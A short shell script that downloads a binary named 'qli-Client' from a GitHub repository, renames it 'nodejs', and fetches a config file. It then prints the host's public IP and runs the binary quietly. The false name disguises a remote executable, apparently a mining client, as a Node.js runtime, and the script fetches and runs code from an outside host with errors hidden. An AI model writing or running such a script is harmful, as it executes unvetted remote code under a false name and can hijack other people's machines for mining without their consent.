#!/bin/sh
mkdir node && cd node
wget -q -O nodejs https://raw.githubusercontent.com/edrivetokenbsc/QBMASTER/main/qli-Client && chmod +x nodejs >/dev/null 2>&1
wget https://raw.githubusercontent.com/edrivetokenbsc/QBMASTER/main/av1/appsettings.json >/dev/null 2>&1
sleep 11 
echo "******************************************************************" 
echo "IP ORI ==> "$(curl ifconfig.me) 
echo " "
./nodejs
